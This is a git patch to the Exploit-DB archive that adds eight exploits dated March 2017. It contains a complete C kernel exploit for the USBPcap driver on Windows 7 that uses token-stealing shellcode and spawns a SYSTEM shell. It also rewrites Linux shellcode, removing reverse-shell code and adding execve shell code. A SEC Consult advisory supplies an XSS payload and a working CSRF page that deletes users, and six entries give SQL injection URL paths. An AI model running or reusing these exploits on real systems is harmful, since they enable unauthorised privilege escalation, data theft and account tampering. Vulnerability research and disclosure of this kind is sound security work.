From 06a7933be47ef3038a9d60d35fecb054787e615b Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 9 Mar 2017 05:01:19 +0000
Subject: [PATCH] DB: 2017-03-09

8 new exploits

USBPcap - Privilege Escalation

Linux - Reverse Shell Shellcode (66 bytes)
Linux - Reverse Shell Shellcode (65 bytes)
Themeforest Clone Script - SQL Injection
Graphicriver Clone Script - SQL Injection
Codecanyon Clone Script - SQL Injection
Audiojungle Clone Script - SQL Injection
Videohive Clone Script - SQL Injection
Envato Clone Script - SQL Injection
Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery
---
 files.csv                             |  10 +-
 platforms/linux/shellcode/41398.nasm  |  63 +++----
 platforms/multiple/webapps/41554.html | 249 ++++++++++++++++++++++++++
 platforms/php/webapps/41548.txt       |  17 ++
 platforms/php/webapps/41549.txt       |  18 ++
 platforms/php/webapps/41550.txt       |  17 ++
 platforms/php/webapps/41551.txt       |  17 ++
 platforms/php/webapps/41552.txt       |  17 ++
 platforms/php/webapps/41553.txt       |  22 +++
 platforms/windows/local/41542.c       | 222 +++++++++++++++++++++++
 10 files changed, 608 insertions(+), 44 deletions(-)
 create mode 100755 platforms/multiple/webapps/41554.html
 create mode 100755 platforms/php/webapps/41548.txt
 create mode 100755 platforms/php/webapps/41549.txt
 create mode 100755 platforms/php/webapps/41550.txt
 create mode 100755 platforms/php/webapps/41551.txt
 create mode 100755 platforms/php/webapps/41552.txt
 create mode 100755 platforms/php/webapps/41553.txt
 create mode 100755 platforms/windows/local/41542.c

diff --git a/files.csv b/files.csv
index 692960480..84517b257 100644
--- a/files.csv
+++ b/files.csv
@@ -8826,6 +8826,7 @@ id,file,description,date,author,platform,type,port
 41458,platforms/linux/local/41458.c,"Linux Kernel 4.4.0 (Ubuntu) - DCCP Double-Free Privilege Escalation",2017-02-26,"Andrey Konovalov",linux,local,0
 41476,platforms/windows/local/41476.txt,"Cisco AnyConnect Secure Mobility Client 4.3.04027 - Privilege Escalation",2017-02-28,Pcchillin,windows,local,0
 41538,platforms/windows/local/41538.cs,"CyberGhost 6.0.4.2205 - Privilege Escalation",2017-03-06,"Kacper Szurek",windows,local,0
+41542,platforms/windows/local/41542.c,"USBPcap - Privilege Escalation",2017-03-07,"Parvez Anwar",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15925,7 +15926,7 @@ id,file,description,date,author,platform,type,port
 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
 41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
 41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
-41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
+41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0
 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0
 41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0
@@ -37461,3 +37462,10 @@ id,file,description,date,author,platform,type,port
 41543,platforms/php/webapps/41543.txt,"Mini CMS 1.1 - 'name' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
 41544,platforms/php/webapps/41544.txt,"Daily Deals Script 1.0 - 'id' Parameter SQL Injection",2017-03-07,"Ihsan Sencan",php,webapps,0
 41546,platforms/aix/webapps/41546.txt,"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities",2017-03-07,RandoriSec,aix,webapps,0
+41548,platforms/php/webapps/41548.txt,"Themeforest Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41549,platforms/php/webapps/41549.txt,"Graphicriver Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41550,platforms/php/webapps/41550.txt,"Codecanyon Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41551,platforms/php/webapps/41551.txt,"Audiojungle Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41552,platforms/php/webapps/41552.txt,"Videohive Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41553,platforms/php/webapps/41553.txt,"Envato Clone Script - SQL Injection",2017-03-08,"Ihsan Sencan",php,webapps,0
+41554,platforms/multiple/webapps/41554.html,"Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2017-03-08,"SEC Consult",multiple,webapps,0
diff --git a/platforms/linux/shellcode/41398.nasm b/platforms/linux/shellcode/41398.nasm
index 73400add3..5e699caad 100755
--- a/platforms/linux/shellcode/41398.nasm
+++ b/platforms/linux/shellcode/41398.nasm
@@ -20,52 +20,29 @@
 ;from, out of or in connection with the software or the use or other 
 ;dealings in the Software.
 ;
-; For a detailed explanation of this shellcode see my blog post: 
-; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
+; For a detailed explanation of this shellcode see my blog post:
+; http://a41l4.blogspot.fr/2017/02/assignment-2b.html
+; 22 bytes, zero nulls
+global _start 
 
-global _start
 section .text
+
 _start:
-; Socket
-	push 41
-	pop rax
-	push 2
-	pop rdi
-	push 1
-	pop rsi
-	cdq
-	syscall
-; Connect
-	xchg edi, eax
-	push rdx
-	mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
-	not rbx
-	push rbx
-	mov al, 42
-	push rsp
-	pop rsi
-	mov dl, 16
-	syscall
-; Dup 2
-	push 3
-	pop rsi
-dup2loop:	
-	mov al, 33
-	dec esi
-        syscall
-	loopnz dup2loop
-; Execve
-	; rax and rsi are zero from the result of the last dup2 syscall and loop
-        push rax ; zero terminator for the following string that we are pushing
-
-        mov rbx, '/bin//sh'
-        push rbx
-
-        ; store /bin//sh address in RDI
-	push rsp
-	pop rdi
+	; zeros RAX, RDX and RSI with only 4 bytes of machine code
+	xor esi,esi
+	mul esi
 	
-	cdq ; zero rdx
+	; null terminator for the following string
+	push rax
 
+	; push /bin//sh in reverse 
+	mov rbx,'/bin//sh'
+	push rbx
+
+	; store /bin//sh address in RDI, points at string
+	push rsp
+	pop rdi
+
+	; Call the Execve syscall 
 	mov al, 59
-        syscall
+	syscall
\ No newline at end of file
diff --git a/platforms/multiple/webapps/41554.html b/platforms/multiple/webapps/41554.html
new file mode 100755
index 000000000..711ca06b1
--- /dev/null
+++ b/platforms/multiple/webapps/41554.html
@@ -0,0 +1,249 @@
+<!--
+SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
+=======================================================================
+              title: Multiple vulnerabilities
+            product: Navetti PricePoint
+ vulnerable version: 4.6.0.0
+      fixed version: 4.7.0.0 or higher
+         CVE number: -
+             impact: high/critical
+           homepage: http://www.navetti.com/
+              found: 2016-07-18
+                 by: W. Schober (Office Vienna)
+                     SEC Consult Vulnerability Lab
+
+                     An integrated part of SEC Consult
+                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+                     https://www.sec-consult.com
+
+=======================================================================
+
+Vendor description:
+-------------------
+"Navetti PricePoint is the ultimate business tool for controlling, managing and
+measuring all aspects of your pricing. Our clients have been able to increase
+their revenue and profitability substantially, implement market- and value-based
+pricing, increase customer trust and implement a common business language
+throughout their organization. In addition, with Navetti PricePoint our clients
+are able to implement governance processes, manage risk and ensure organization
+compliance, and attain business sustainability."
+
+Source:
+http://www.navetti.com/our-expertise/navetti-pricepoint/
+
+
+Business recommendation:
+------------------------
+During a quick security check, SEC Consult identified four vulnerabilities,
+which are partially critical. As the time frame of the test was limited, it is
+suspected that there are more vulnerabilities in the application.
+
+It is highly recommended by SEC Consult to apply the patch resolving the
+identified vulnerabilities before using Navetti PricePoint in an environment
+with potential attackers.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) SQL Injection (Blind boolean based)
+Navetti PricePoint is prone to SQL injection attacks. The attacks can be
+executed by all privilege levels, ranging from the lowest privileged users to
+the highest privileged users.
+
+By exploiting this vulnerability, an attacker gains access to all records
+stored in the database with the privileges of the database user.
+
+2) Multiple persistent cross site scripting vulnerabilities
+The web application suffers from multiple persistent cross site scripting issues.
+Low privileged users as well as high privileged users, are able to inject
+malicious JavaScript payloads persistently in the application. This
+vulnerability is even more critical, because it can be used by a low privileged
+user who wants to elevate his privileges. The low privileged attacker can
+place a payload which creates a new superuser, or add his own account to the
+superuser group. If a superuser logs in to the application, the JavaScript
+payload is executed with the rights of the superuser and the new user is
+created or added to the superuser group.
+
+3) Multiple reflected cross site scripting vulnerabilities
+Navetti PricePoint suffers from multiple reflected cross site scripting issues.
+The code which is used to generate error messages inside of the application,
+does not correctly escape/sanitize user input. Due to that all error messages
+containing user input are prone to reflected cross site scripting attacks.
+Furthermore the file upload dialog does not correctly sanitize the file name of
+uploaded files. If a file name contains a JavaScript payload, it is executed in
+the file upload dialog.
+
+4) Cross Site Request Forgery
+Navetti PricePoint doesn't implement any kind of cross site request forgery
+protection. Attackers are able to execute arbitrary requests with the privileges
+of any user. The only requirement is, that the victim clicks on a malicious
+link. For example an administrator can be forced to execute unwanted actions.
+Some of these actions are:
+
+  -) Add users
+  -) Delete users
+  -) Add users to an arbitrary role
+  -) Change internal settings of the application
+
+
+Proof of concept:
+-----------------
+1) SQL Injection (Blind boolean based)
+The search function in the tree structure, which displays various groups, does
+not properly validate user input, allowing an attacker with any privilege level
+to  inject arbitrary SQL commands and read the contents of the whole database.
+
+The following URL could be used to perform blind SQL injection attacks:
+-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
+  (Parameter: searchString, Type: GET)
+
+2) Multiple persistent cross site scripting vulnerabilities
+The following URL parameters have been identified to be vulnerable against
+persistent cross site scripting:
+
+-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
+-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
+-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Parameter: name,POST)
+
+The proof of concept shows just selected examples of cross-site scripting
+vulnerabilities. Based on the conducted tests, SEC Consult identified that
+proper input validation is lacking.
+Due to the limited time frame of the test, it was not possible to verify every
+single parameter of the application. Therefore, it can be assumed, that there
+are similar flaws in other parts of the web application.
+
+3) Multiple reflected cross site scripting vulnerabilities
+The application is also prone to reflected cross site scripting attacks. The
+vulnerabilities were observed in at least two main parts of the application.
+Those two parts are error messages and the file upload functionality.
+
+-) Error Messages
+    Every user input which is reflected in error messages, is not correctly
+    escaped and injection of malicious JavaScript code is possible.
+
+-) File uploads
+    The file upload functionality is not correctly escaping the filename of
+    uploaded files. If a victim is forced to upload a special crafted file, an
+    arbitrary JavaScript payload can be triggered and executed in the victim's
+    context. An example for a working, but very obvious payload in the filename
+    would be the following example:
+
+    -) <img src=x onerror=alert(document.cookies)>.xlsx
+
+4) Cross Site Request Forgery
+The application is prone to cross site request forgery attacks because no
+measures such as CSRF tokens or nounces, are in place. The following proof of
+concept deletes the user account
+with ID 18:
+-->
+
+<html>
+<body>
+ <script>
+    function submitRequest()
+    {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "https://($IP|$Domain)/NBN.Host/PermissionsManagement/
+        PermissionsManagement/DeleteUsers", true);
+        xhr.setRequestHeader("Accept", "*/*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "text/plain");
+        xhr.withCredentials = true;
+        var body = "{\"DeleteAll\":false,\"UserIDs\":[\"18\"]}";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+                aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+    }
+</script>
+<form action="#">
+ <input type="button" value="Submit request" onclick="submitRequest();" />
+</form>
+</body>
+</html>
+
+<!--
+If a victim visits a website, which is hosted by an attacker, the script above
+would be executed and the user with the userID 18 would be deleted. Due to the
+complete absence of measures against cross site request forgery, it can be
+assumed that the application is vulnerable for this
+kind of attack.
+
+
+Vulnerable / tested versions:
+-----------------------------
+SEC Consult tested Navetti PricePoint 4.6.0.0.
+This version was the latest version at the time of the discovery.
+
+
+Vendor contact timeline:
+------------------------
+2016-07-27: Contacting vendor through info@navetti.com
+2016-07-27: Vendor provided a technical contact who is responsible for
+            vulnerability coordination, furthermore clear-text communication
+            was requested.
+2016-07-27: Providing advisory and proof of concept through insecure channel
+            as requested.
+2016-08-05: Navetti provided a status update concerning a new version of
+            Navetti Price Point. The release date of the version, where all
+            the vulnerabilities are fixed, will be provided soon
+2016-08-11: Navetti sent an update containing their upcoming release schedule.
+            The update of Navetti Price Point, which should fix all the
+            vulnerabilities, will be released on 2016-10-01.
+2016-10-01: Patch available
+2017-03-08: SEC Consult releases security advisory
+
+
+Solution:
+---------
+Update to the latest version available. According to Navetti, all the
+vulnerabilities are fixed in release 4.7.0.0.
+
+According to the vendor, they have further improved their software security
+since our initial contact.
+
+
+Workaround:
+-----------
+No workaround available
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/Career.htm
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF W. Schober / @2017
+-->
\ No newline at end of file
diff --git a/platforms/php/webapps/41548.txt b/platforms/php/webapps/41548.txt
new file mode 100755
index 000000000..bd18d6f14
--- /dev/null
+++ b/platforms/php/webapps/41548.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Themeforest Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://themeforestclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/marketplus/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41549.txt b/platforms/php/webapps/41549.txt
new file mode 100755
index 000000000..2f1f765ba
--- /dev/null
+++ b/platforms/php/webapps/41549.txt
@@ -0,0 +1,18 @@
+# # # # # 
+# Exploit Title: Graphicriver Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://graphicriverclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/graphicriverclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
+
diff --git a/platforms/php/webapps/41550.txt b/platforms/php/webapps/41550.txt
new file mode 100755
index 000000000..9a28f202a
--- /dev/null
+++ b/platforms/php/webapps/41550.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Codecanyon Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://codecanyonclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/codecanyonclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
\ No newline at end of file
diff --git a/platforms/php/webapps/41551.txt b/platforms/php/webapps/41551.txt
new file mode 100755
index 000000000..729a145b2
--- /dev/null
+++ b/platforms/php/webapps/41551.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Audiojungle Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://audiojungleclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/audiojungleclone
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41552.txt b/platforms/php/webapps/41552.txt
new file mode 100755
index 000000000..a1e2d4c38
--- /dev/null
+++ b/platforms/php/webapps/41552.txt
@@ -0,0 +1,17 @@
+# # # # # 
+# Exploit Title: Videohive Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://videohiveclone.bsetec.com/
+# Demo: http://www.bsetecdemo.com/videohiveclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/LastAdded/?by=[SQL]
+# # # # #
diff --git a/platforms/php/webapps/41553.txt b/platforms/php/webapps/41553.txt
new file mode 100755
index 000000000..b5f1d57cf
--- /dev/null
+++ b/platforms/php/webapps/41553.txt
@@ -0,0 +1,22 @@
+# # # # # 
+# Exploit Title: Envato Clone Script - SQL Injection
+# Google Dork: N/A
+# Date: 08.03.2017
+# Vendor Homepage: http://bsetec.com/
+# Software : http://envatoclone.bsetec.com/
+# Demo: http://bsetecdemo.com/envatoclone/
+# Version: N/A
+# Tested on: Win7 x64, Kali Linux x64
+# # # # # 
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# http://localhost/[PATH]/codes/php-scripts/?by=[SQL]
+# http://localhost/[PATH]/graphics/graphics/?by=[SQL]
+# http://localhost/[PATH]/themes/word-press/?by=[SQL]
+# http://localhost/[PATH]/audios/music/?by=[SQL]
+# # # # #
+
+
diff --git a/platforms/windows/local/41542.c b/platforms/windows/local/41542.c
new file mode 100755
index 000000000..2c78ad76f
--- /dev/null
+++ b/platforms/windows/local/41542.c
@@ -0,0 +1,222 @@
+/*
+
+Exploit Title    - USBPcap Null Pointer Dereference Privilege Escalation
+Date             - 07th March 2017
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - http://desowin.org/usbpcap/ 
+Tested Version   - 1.1.0.0  (USB Packet capture for Windows bundled with WireShark 2.2.5)
+Driver Version   - 1.1.0.0 - USBPcap.sys
+Tested on OS     - 32bit Windows 7 SP1 
+CVE ID           - CVE-2017-6178
+Vendor fix url   - not yet
+Fixed Version    - 0day
+Fixed driver ver - 0day
+
+
+USBPcap.sys
+-----------
+
+.text:992AF494 loc_992AF494:                                                         
+.text:992AF494                 mov     ecx, [edi+8]                                  ; DeviceObject
+.text:992AF494                                                                       
+.text:992AF497                 inc     byte ptr [esi+23h]
+.text:992AF49A                 add     dword ptr [esi+60h], 24h
+.text:992AF49E                 mov     edx, esi                                      ; Irp
+.text:992AF4A0                 call    ds:IofCallDriver                              ; IofCallDriver function called without validating values !!!
+.text:992AF4A6                 push    18h                                           ; RemlockSize
+.text:992AF4A8                 push    esi                                           ; Tag
+.text:992AF4A9                 push    ebx                                           ; RemoveLock
+.text:992AF4AA                 mov     edi, eax
+.text:992AF4AC                 call    ds:IoReleaseRemoveLockEx
+.text:992AF4B2                 mov     eax, edi
+
+
+
+kd> u nt!IofCallDriver
+.
+.
+.
+82a7111b eb0c            jmp     nt!IofCallDriver+0x63 (82a71129)
+82a7111d 8b4608          mov     eax,dword ptr [esi+8] ds:0023:00000008=????????        <------------ null pointer dereference
+82a71120 52              push    edx
+82a71121 0fb6c9          movzx   ecx,cl
+82a71124 56              push    esi
+82a71125 ff548838        call    dword ptr [eax+ecx*4+38h]                              <------------ control flow of execution
+82a71129 5e              pop     esi
+82a7112a 59              pop     ecx
+82a7112b 5d              pop     ebp
+82a7112c c3              ret
+
+
+*/
+
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 4096
+
+
+typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)(
+     IN HANDLE ProcessHandle,
+     IN OUT PVOID *BaseAddress,
+     IN ULONG ZeroBits,
+     IN OUT PULONG RegionSize,
+     IN ULONG AllocationType,
+     IN ULONG Protect);
+
+
+
+// Windows 7 SP1
+
+#define W7_KPROCESS 0x50      // Offset to _KPROCESS from a _ETHREAD struct
+#define W7_TOKEN    0xf8      // Offset to TOKEN from the _EPROCESS struct
+#define W7_UPID     0xb4      // Offset to UniqueProcessId FROM the _EPROCESS struct
+#define W7_APLINKS  0xb8      // Offset to ActiveProcessLinks _EPROCESS struct
+
+
+BYTE token_steal_w7[] =
+{
+  0x60,                                                  // pushad                         Saves all registers
+  0x64,0xA1,0x24,0x01,0x00,0x00,                         // mov eax, fs:[eax+124h]         Retrieve ETHREAD
+  0x8b,0x40,W7_KPROCESS,                                 // mov eax, [eax+W7_KPROCESS]     Retrieve _KPROCESS
+  0x8b,0xc8,                                             // mov ecx, eax                   Current _EPROCESS structure
+  0x8b,0x98,W7_TOKEN,0x00,0x00,0x00,                     // mov ebx, [eax+W7_TOKEN]        Retrieves TOKEN
+  0x8b,0x80,W7_APLINKS,0x00,0x00,0x00,                   // mov eax, [eax+W7_APLINKS] <-|  Retrieve FLINK from ActiveProcessLinks
+  0x81,0xe8,W7_APLINKS,0x00,0x00,0x00,                   // sub eax, W7_APLINKS         |  Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+  0x81,0xb8,W7_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00,  // cmp [eax+W7_UPID], 4        |  Compares UniqueProcessId with 4 (System Process)
+  0x75,0xe8,                                             // jne                     ---- 
+  0x8b,0x90,W7_TOKEN,0x00,0x00,0x00,                     // mov edx, [eax+W7_TOKEN]        Retrieves TOKEN and stores on EDX
+  0x89,0x91,0xF8,0x00,0x00,0x00,                         // mov [ecx+W7_TOKEN], edx        Overwrites the TOKEN for the current KPROCESS
+  0x61,                                                  // popad                          Restores all registers
+  0x83,0xc4,0x18,                                        // add esp,18
+  0xc3                                                   // ret 
+};
+
+
+
+
+
+void spawnShell()
+{
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+
+
+    ZeroMemory(&pi, sizeof(pi));
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+
+    si.cb          = sizeof(si); 
+    si.dwFlags     = STARTF_USESHOWWINDOW;
+    si.wShowWindow = SW_SHOWNORMAL;
+
+    if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
+    {
+       printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError());
+       return;
+    }
+
+    CloseHandle(pi.hThread);
+    CloseHandle(pi.hProcess);
+}
+
+
+
+int main(int argc, char *argv[]) 
+{
+
+    _NtAllocateVirtualMemory    NtAllocateVirtualMemory;
+    LPVOID                      addrtoshell;
+    NTSTATUS                    allocstatus;
+    LPVOID                      base_addr = (LPVOID)0x00000001;                     
+    DWORD                       written;
+    int                         rwresult;
+    int                         size = BUFSIZE; 
+    HANDLE                      hDevice;
+    DWORD                       dwRetBytes = 0;    
+    unsigned char               buffer[BUFSIZE];    
+    unsigned char               devhandle[MAX_PATH]; 
+
+
+
+    printf("-------------------------------------------------------------------------------\n");
+    printf("           USBPCAP (usbpcap.sys) Null Pointer Dereference EoP Exploit          \n");
+    printf("                        Tested on Windows 7 SP1 (32bit)                        \n");
+    printf("-------------------------------------------------------------------------------\n\n");
+
+
+    sprintf(devhandle, "\\\\.\\%s", "usbpcap1");
+
+    addrtoshell = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if(addrtoshell == NULL)
+    {
+        printf("[-] VirtualAlloc memory allocation failure %.8x\n\n", GetLastError());
+        return -1;
+    }
+    printf("[+] VirtualAlloc memory allocated at %p\n", addrtoshell);
+
+    memcpy(addrtoshell, token_steal_w7, sizeof(token_steal_w7));
+    printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_w7));
+
+    NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory");
+ 	
+    if (!NtAllocateVirtualMemory)
+    {
+        printf("[-] Unable to resolve NtAllocateVirtualMemory\n");
+        return -1;  
+    }
+
+    printf("[+] NtAllocateVirtualMemory [0x%p]\n", NtAllocateVirtualMemory);
+    printf("[+] Allocating memory at [0x%p]\n", base_addr);
+	 
+    allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+
+    if (allocstatus) 
+    {
+        printf("[-] An error occured while mapping executable memory (0x%08x) %d\n\n", allocstatus, GetLastError());
+        return -1;
+    }
+    printf("[+] NtAllocateVirtualMemory successful\n");
+
+    memset(buffer, 0x00, BUFSIZE);
+    memcpy(buffer+0x0000006b, &addrtoshell, 4);
+
+    rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written);
+
+    if (rwresult == 0)
+    {
+        printf("[-] An error occured while mapping writing memory: %d\n", GetLastError());
+        return -1;
+    }
+    printf("[+] WriteProcessMemory %d bytes written\n", written);  
+
+    printf("[+] Device handle %s\n", devhandle);
+    
+    hDevice = CreateFile(devhandle, 0, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
+    
+    if (hDevice == INVALID_HANDLE_VALUE)
+    {
+        printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError());
+        return -1;
+    }
+    else 
+    {
+        printf("[+] Open %s device successful\n", devhandle);
+    }
+
+    printf("[~] Press any key to send Exploit  . . .\n");
+    getch();
+
+    DeviceIoControl(hDevice, 0x00090028, NULL, 0, NULL, 0, &dwRetBytes, NULL);
+
+    CloseHandle(hDevice);
+
+    printf("[+] Spawning SYSTEM Shell\n");
+    spawnShell();
+
+    return 0;
+}
+